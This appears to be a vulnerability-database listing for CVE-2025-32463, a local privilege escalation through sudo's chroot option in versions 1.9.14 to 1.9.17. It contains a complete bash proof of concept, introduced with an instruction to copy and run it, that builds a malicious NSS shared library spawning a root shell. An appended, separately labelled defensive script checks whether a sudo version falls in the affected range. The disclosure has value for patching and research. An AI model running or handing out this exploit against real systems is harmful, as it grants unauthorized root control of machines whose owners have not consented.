📄 Sudo chroot 1.9.17 Privilege Escalation

09 Jul 2025 | Reported by Stratascale | Type: packetstorm | Source: packetstorm.news

A flaw in sudo's chroot option enables local privilege escalation to root in versions 1.9.14 to 1.9.17 (CVE-2025-32463).

Exploit Title: Sudo chroot 1.9.17 - Local Privilege Escalation
    Google Dork: not applicable
    Date: Mon, 30 Jun 2025
    Exploit Author: Stratascale
    Vendor Homepage: https://salsa.debian.org/sudo-team/sudo
    Software Link:
    Version: Sudo versions 1.9.14 to 1.9.17 inclusive
    Tested on: Kali Rolling 2025-7-3
    CVE : CVE-2025-32463
    
    *Version running today in Kali:*
    https://pkg.kali.org/news/640802/sudo-1916p2-2-imported-into-kali-rolling/
    
    *Background*
    
    An attacker can leverage sudo's -R (--chroot) option to run
    arbitrary commands as root, even if they are not listed in the
    sudoers file.
    
    Sudo versions affected:
    
        Sudo versions 1.9.14 to 1.9.17 inclusive are affected.
    
    CVE ID:
    
        This vulnerability has been assigned CVE-2025-32463 in the
        Common Vulnerabilities and Exposures database.
    
    Details:
    
        Sudo's -R (--chroot) option is intended to allow the user to
        run a command with a user-selected root directory if the sudoers
        file allows it.  A change was made in sudo 1.9.14 to resolve
        paths via chroot() using the user-specified root directory while
        the sudoers file was still being evaluated.  It is possible for
        an attacker to trick sudo into loading an arbitrary shared
        library by creating an /etc/nsswitch.conf file under the
        user-specified root directory.
    
        The change from sudo 1.9.14 has been reverted in sudo 1.9.17p1
        and the chroot feature has been marked as deprecated.  It will
        be removed entirely in a future sudo release.  Because of the
        way sudo resolves commands, supporting a user-specified chroot
        directory is error-prone and this feature does not appear to
        be widely used.
    
        A more detailed description of the bug and its effects can be
        found in the Stratascale advisory:
        https://www.stratascale.com/vulnerability-alert-CVE-2025-32463-sudo-chroot
    
    Impact:
    
        On systems that support /etc/nsswitch.conf a user may be able
        to run arbitrary commands as root.
    
    *Exploit:*
    
    *Verify the sudo version running: sudo --version. If it is vulnerable, copy and
    paste the following code and run it.*
    *----------------------*
    #!/bin/bash
    # sudo-chwoot.sh – PoC CVE-2025-32463
    set -e
    
    STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
    cd "$STAGE"
    
    # 1. NSS library
    cat > woot1337.c <<'EOF'
    #include <stdlib.h>
    #include <unistd.h>
    
    __attribute__((constructor))
    void woot(void) {
        setreuid(0,0);          /* change to UID 0 */
        setregid(0,0);          /* change  to GID 0 */
        chdir("/");             /* exit from chroot */
        execl("/bin/bash","/bin/bash",NULL); /* root shell */
    }
    EOF
    
    # 2. Mini chroot with toxic nsswitch.conf
    mkdir -p woot/etc libnss_
    echo "passwd: /woot1337" > woot/etc/nsswitch.conf
    cp /etc/group woot/etc            # make getgrnam() not fail
    
    # 3. compile libnss_
    gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c
    
    echo "[*] Running exploit…"
    sudo -R woot woot                 # (-R <dir> <cmd>)
                                       # • the first “woot” is chroot
                                       # • the second “woot” is a nonexistent command
                                       #   (sudo only needs to resolve the user)
    
    rm -rf "$STAGE"
    *----------------------*
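
A defender-side version check for the affected range stated above (1.9.14 through 1.9.17, reverted in 1.9.17p1), added here as an example; it is not part of the original advisory or PoC. The function names `sudo_chroot_verdict` and `local_sudo_version` are hypothetical, and the sample versions in the loop are constructed.

```shell
#!/bin/sh
# Added example, not part of the advisory. Function names are hypothetical.
# Range from the advisory: 1.9.14 through 1.9.17 affected, reverted in 1.9.17p1.

# Prints "affected", "not-affected" or "unknown" for a version like 1.9.16p2.
sudo_chroot_verdict() {
    ver=$1
    # Accept only upstream-style versions: MAJOR.MINOR.MICRO with optional pN.
    if ! printf '%s\n' "$ver" | grep -Eq '^[0-9]+\.[0-9]+\.[0-9]+(p[0-9]+)?$'; then
        echo unknown; return 0
    fi
    base=${ver%%p*}                    # "1.9.16p2" -> "1.9.16"
    patch=0
    case $ver in *p*) patch=${ver#*p} ;; esac
    old_ifs=$IFS; IFS=.
    set -- $base                       # split into major, minor, micro
    IFS=$old_ifs
    # Before 1.9.14 the change did not exist; releases after 1.9.17 are
    # assumed to keep the 1.9.17p1 revert.
    if [ "$1" -ne 1 ] || [ "$2" -ne 9 ] || [ "$3" -lt 14 ] || [ "$3" -gt 17 ]; then
        echo not-affected; return 0
    fi
    # 1.9.17p1 carries the revert; later patch levels are assumed to keep it.
    if [ "$3" -eq 17 ] && [ "$patch" -ge 1 ]; then
        echo not-affected; return 0
    fi
    echo affected
}

# Reads the "Sudo version X" banner; prints nothing if sudo is not installed.
local_sudo_version() {
    command -v sudo >/dev/null 2>&1 || return 0
    sudo --version 2>/dev/null | awk '/^Sudo version /{print $3; exit}'
}

# Constructed sample versions first, then the locally installed sudo (if any).
for v in 1.9.13p3 1.9.14 1.9.16p2 1.9.17 1.9.17p1 "$(local_sudo_version)"; do
    if [ -n "$v" ]; then
        printf '%-10s %s\n' "$v" "$(sudo_chroot_verdict "$v")"
    fi
done
```

A distribution package can carry a backported fix without changing the upstream version string, so treat an "affected" result as a prompt to check the vendor's advisory for that package.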

Vulners AI Score: 7.4 (High risk)
CVSS 3.1: 7.8 - 9.3
EPSS: 0.57345